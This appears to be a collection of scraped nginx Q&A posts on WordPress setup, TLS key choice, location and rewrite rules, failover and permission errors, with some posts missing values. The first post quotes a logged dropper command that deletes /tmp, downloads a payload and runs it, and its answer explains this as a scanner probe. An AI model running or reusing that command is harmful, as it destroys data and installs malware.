Why request shell commands from nginx?

I was playing around with nginx and noticed that within 1-2 hours of putting it online, I got entries like this in my logs:

    - -  "GET /shell?cd+/tmp;rm+-rf+*;wget+;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello, world"
    - -  "GET / HTTP/1.1" 301 169 "http://[IP OF MY SERVER]:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
    - -  "GET / HTTP/1.1" 400 157 "-" "-"
    - -  "GET / HTTP/1.1" 400 157 "-" "-"

The IPs are, needless to say, not expected for this server.

I assume these are automated hack attempts. But what is the logic of requesting shell commands from nginx? Is it common for nginx to allow access to a shell? Is it possible to tell what specific exploit was attacked from these entries?
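For what it's worth, the `+` signs in the first request are just URL-encoded spaces, so the query string can be decoded into a plain dropper script (a sketch reproducing the payload from the log line above; the wget URL was already stripped in the logged request):

```shell
# '+' is the URL encoding of a space; tr makes the payload readable
printf '%s\n' 'cd+/tmp;rm+-rf+*;wget+;sh+/tmp/jaws' | tr '+' ' '
```

The decoded commands wipe /tmp, fetch a payload, and run it. The `jaws` name and the "Hello, world" user agent appear to belong to scanners probing the known `/shell` remote-command-execution hole in the JAWS web server shipped on some DVR devices. Nginx has no such endpoint, so the probe fails harmlessly; the scanners simply spray every reachable IP because vulnerable devices are cheap to find, which is why a fresh server sees this within hours.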

Why can’t I connect to the WordPress install page with Nginx?

I’m a WordPress newbie. My environment is Ubuntu 18 + Nginx + PHP 7.

Following the tutorial (https://www.myfreax.com/how-to-install-wordpress-with-nginx-on-ubuntu-18-04/), the WordPress directory was placed in /var/www/html/device1.com.

Then I configured nginx; here is my nginx config:

server {
    listen 80;
    server_name www.device1.com device1.com;
    root /var/www/html/device1.com;
    index index.php;

    # log files
    access_log /var/log/nginx/device1.com.access.log;
    error_log /var/log/nginx/device1.com.error.log;

    location = /favicon.ico {
        log_not_found off;
        access_log off;
    }

    location = /robots.txt {
        allow all;
        log_not_found off;
        access_log off;
    }

    location / {
        try_files $uri $uri/ /index.php?$args;
    }

    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php7.2-fpm.sock;
    }

    location ~* \.(js|css|png|jpg|jpeg|gif|ico|svg)$ {
        expires max;
        log_not_found off;
    }
}

But when I try to open http://device1.com/wp-admin/install.php, Nginx responds with a 404 instead of returning the WordPress install page.

I don’t have any idea how to debug this. Thanks for any suggestions.
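One common cause worth ruling out first (an assumption, since the question doesn't show a directory listing): the WordPress tarball unpacks into a `wordpress/` subdirectory, so the installer may actually live at `/var/www/html/device1.com/wordpress/wp-admin/install.php` while `root` points one level higher, and every request 404s. If `ls /var/www/html/device1.com` shows a `wordpress` folder instead of `wp-admin`, `wp-content`, and `wp-includes`, either move the files up one level or point the root at the subdirectory:

```nginx
# only if WordPress was unpacked into a wordpress/ subdirectory
root /var/www/html/device1.com/wordpress;
```

Either way, the error log already configured above (`/var/log/nginx/device1.com.error.log`) records the exact filesystem path nginx tried to open for the failing request, which settles the question immediately.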

Algorithm and key size to choose for SSL certificates (security and CPU wise) in 2020 (using nginx)

I posted this question already on SO, but as it is not really a programming question, I thought this might be a better place to ask:

I want to set up a new SSL certificate store for generating SSL certs (server certs (nginx) and client certs (Linux/Windows devices)).

I’ve been searching for quite some time and I’m not sure I fully understand, especially as some articles are a few years old.

Many articles just talk about RSA and seem to recommend 2048 or 3072, though mentioning that 2048 is today probably still the best choice (https://expeditedsecurity.com/blog/measuring-ssl-rsa-keys/).

I found, for example, one article (https://paragonie.com/blog/2019/03/definitive-2019-guide-cryptographic-key-sizes-and-algorithm-recommendations), but it seems to talk mostly about key encryption, as @dave_thompson_085 pointed out on SO,

stating in the section “Asymmetric (“Public Key”) Encryption”

Use, in order of preference:

    X25519 (for which the key size never changes) then symmetric encryption.
    ECDH with secp256r1 (for which the key size never changes) then symmetric encryption.
    RSA with 2048-bit keys.

The security of a 256-bit elliptic curve cryptography key is about even with 3072-bit RSA. Although many organizations are recommending migrating from 2048-bit RSA to 3072-bit RSA (or even 4096-bit RSA) in the coming years, don't follow that recommendation. Instead migrate from RSA to elliptic curve cryptography, and then breathe easy while you keep an eye out for post-quantum cryptography recommendations.

However, they don’t mention the impact on server CPU usage compared to RSA 2048/3072/4096. I also didn’t find many other articles suggesting a switch to elliptic curve algorithms.

Another article (https://www.thesslstore.com/blog/you-should-be-using-ecc-for-your-ssl-tls-certificates/) tries to promote ECC instead of RSA, but comments on the article state that ECC is less safe than RSA if quantum computers kick in. And the article cites no numbers for what performance improvement to expect when using ECC.

https://crypto.stackexchange.com/questions/1190/why-is-elliptic-curve-cryptography-not-widely-used-compared-to-rsa mentions potential legal issues and fear of being sued.

Though CPU usage is not a major issue, I’d still like to get some idea, as I’d like to use the same CA and cert store on devices like Raspberry Pis.

So what is today the best choice of certificate key algorithm and key size for server certs (old Internet Explorer is not required, but PCs, tablets, and mobile phones in use today should be able to connect to the server),

and what’s the best choice for client certs (which will not be used on mobile devices)?

I kind of tend toward RSA 2048, but I’m really not sure I’m interpreting all the articles correctly, and I don’t like making choices based on feelings.
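For concrete CPU numbers on your own hardware, `openssl speed rsa2048 ecdsap256` compares sign/verify rates directly; ECDSA P-256 signing is typically far faster than RSA-2048 signing, which is what matters on a busy TLS server (and on a Raspberry Pi). Generating an ECDSA server key and a throwaway test certificate is a one-liner each (a sketch; the filenames and subject are placeholders):

```shell
# ECDSA P-256 key: the curve that nginx and effectively all current clients support
openssl ecparam -name prime256v1 -genkey -noout -out server.key

# self-signed cert for testing only; sign with your own CA for real deployments
openssl req -new -x509 -key server.key -out server.crt -days 365 -subj "/CN=test.example"
```

Current browsers, Windows, and mobile OSes have supported ECDSA certificates for years; the usual compromise when very old clients matter is to serve both an RSA and an ECDSA certificate from nginx (it accepts multiple `ssl_certificate`/`ssl_certificate_key` pairs) and let each client negotiate the one it can use.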

Location directive is not working correctly in nginx

I am trying to open the location of my index.php file. For example:

The root folder is:

Code (markup):

The URL a user will use to get to this root folder is:

Code (markup):

Every time I use this location declaration, I get a 404 or a Forbidden message:

location /server/client/ {
    alias /path/to/my/root/folder;
    try_files $uri $uri/ /index.php$uri$is_args$args;
}
Code (markup):

I just cannot…
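`alias` plus `try_files` is a known nginx sore spot: the last `try_files` argument is treated as a URI, not a filesystem path, so in an aliased location it has to repeat the location prefix, and the trailing slashes on `location` and `alias` should match. A sketch of the usual working shape, keeping the placeholder paths from the question (the PHP socket path is an assumption):

```nginx
location /server/client/ {
    alias /path/to/my/root/folder/;   # trailing slash matching the location's
    index index.php;
    # the fallback is a URI, so it needs the /server/client/ prefix again
    try_files $uri $uri/ /server/client/index.php$is_args$args;

    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        # under alias, $request_filename resolves correctly where
        # $document_root$fastcgi_script_name would not
        fastcgi_param SCRIPT_FILENAME $request_filename;
        fastcgi_pass unix:/run/php/php7.2-fpm.sock;
    }
}
```

If the last path component of the location happens to match the last component of the filesystem path, using `root` instead of `alias` sidesteps the whole problem and is generally the less fragile choice.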


Add Failthrough server of a LAN IP to Nginx?

I’m trying to add my machine’s LAN IP as a ‘failthrough’ location to use in the event the main server has issues.

Lately, my main server name (i.e. https://myserver.domain.com) has been having issues due to LetsEncrypt cert problems, so any URL running on my server under that domain name fails as well. What I want is for Nginx to automatically pass requests to the machine’s IP instead if it detects that the domain name itself is down.

I’m using the Docker LinuxServer LetsEncrypt container, and I’ve tried just adding the IP to the server_name variable in the config, but after restarting the container nothing changes when navigating to https://myserver.domain.com (it still gives the same error page instead of redirecting to the IP).

Here’s the current config with the issue:

server {
    listen 443 ssl http2 default_server;

    root /config/www;
    index index.php index.html index.htm;

    server_name myserver.*;

    # enable subfolder method reverse proxy confs
    include /config/nginx/proxy-confs/*.subfolder.conf;

    # Tell search engines not to crawl/add this domain
    add_header X-Robots-Tag "noindex, nofollow, nosnippet, noarchive";

    # all ssl related config moved to ssl.conf
    include /config/nginx/ssl.conf;

    # enable for ldap auth
    #include /config/nginx/ldap.conf;

    client_max_body_size 0;

    location ~ \.php$ {
        fastcgi_split_path_info ^(.+\.php)(/.+)$;
        fastcgi_pass;
        fastcgi_index index.php;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        include /etc/nginx/fastcgi_params;
    }
}

Note this line in particular; the IP as the second server is the intended failthrough IP:

server_name myserver.*;

Also note: if I just use directly in a browser, it navigates to the intended page fine, so this has to be something config-wise with Nginx that I’m trying to solve. It seems like a pretty simple issue, but I’m not super familiar with Nginx config nuances yet.
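Two separate things are getting conflated here. First, `server_name` only selects which server block handles a request that has already arrived; listing a second name or IP there provides no failover at all. Second, if the LetsEncrypt certificate itself is broken, the TLS handshake fails before nginx ever routes the request, so no server-side configuration can help a client that rejects the cert. What nginx can do is proxy to a backup address when a primary upstream stops answering, via an `upstream` block with a `backup` server. A sketch (the addresses and ports are placeholders, since the question elided the real IP):

```nginx
upstream app_backend {
    server 127.0.0.1:8080;            # primary app (placeholder)
    server 192.168.1.50:8080 backup;  # LAN fallback, used only when the primary fails
}

server {
    listen 443 ssl http2 default_server;
    server_name myserver.*;
    # ssl.conf include etc. as in the existing config

    location / {
        proxy_pass http://app_backend;
    }
}
```

If the actual goal is just browsing by IP while the domain is broken, that already works as noted; nginx cannot redirect clients around a failed TLS handshake on its own hostname.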

Handling locations with Nginx, Apache-style

I recently moved from Apache to Nginx and discovered that the way URLs are handled is a bit different. Since I need to fix this soon, could someone show me how to make URLs like these in the server block:

miweb.com/nombredelscript (no extension)
miweb.com/un-titulo-web (which should execute, for example: script2.php?titulo=$1)
miweb.com/trabajos/titulo-de-trabajo (which should execute, for example: works.php?id=$1)

I have tried but can’t get it working.
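Nginx has no .htaccess, but `rewrite` and `try_files` inside the server block cover all three Apache-style rules. A sketch, assuming the PHP scripts sit in the web root and a standard Ubuntu PHP-FPM setup (the socket path is an assumption):

```nginx
# miweb.com/trabajos/titulo-de-trabajo -> works.php?id=titulo-de-trabajo
rewrite ^/trabajos/(.+)$ /works.php?id=$1 last;

location / {
    try_files $uri $uri/ @extensionless;
}

# miweb.com/nombredelscript -> /nombredelscript.php; 'last' re-runs location
# matching, so the rewritten URI lands in the PHP block and actually executes
location @extensionless {
    rewrite ^(.*)$ $1.php last;
}

location ~ \.php$ {
    include snippets/fastcgi-php.conf;
    fastcgi_pass unix:/run/php/php7.2-fpm.sock;  # adjust to your socket
}
```

The script2 case works the same way as the trabajos rule (`rewrite ^/([^/.]+)$ /script2.php?titulo=$1 last;`), but note it overlaps with the extensionless rule, since both claim single-segment URLs, so only one of the two can own that pattern.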

Nginx 403 Forbidden error on a simple conf file

I’ve got a new Ubuntu 18.04 droplet on DO. I just installed Nginx and Ufw (which is disabled for now). I have this conf file inside the /etc/nginx/conf.d folder:

server {
    listen 80;
    listen [::]:80;

    root /var/www/2;
    index index.html index.htm index.nginx-debian.html;

    server_name 2.hotelbobbygg.xyz;

    location / {
        try_files $uri $uri/ =404;
    }
}

I’ve also tried commenting out the third line from the end, i.e. the try_files line, but it still behaves the same.

Please help me figure out what is preventing access to the index.html inside the /var/www/2 folder.
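A 403 from nginx on a static file almost always means the worker process (`www-data` on Ubuntu) cannot read the file or cannot traverse one of the parent directories; a `/var/www/2` created as root with a restrictive umask is the classic cause. A sketch that reproduces the failure mode with a throwaway directory (the paths are placeholders, not the droplet's):

```shell
mkdir -p /tmp/demo403/site
echo hello > /tmp/demo403/site/index.html
chmod 0700 /tmp/demo403       # parent not world-searchable: nginx would return 403
ls -ld /tmp/demo403 /tmp/demo403/site /tmp/demo403/site/index.html
chmod 0755 /tmp/demo403       # fix: every directory on the path needs o+x
```

On the real box, `namei -l /var/www/2/index.html` prints the permission bits of every path component in one shot, and `sudo -u www-data cat /var/www/2/index.html` confirms whether the worker can read the file; the nginx error log (`/var/log/nginx/error.log`) records the exact open() failure. One other possibility worth checking: if no index file exists in `/var/www/2` at all, the `$uri/` directory lookup with autoindex off also yields a 403.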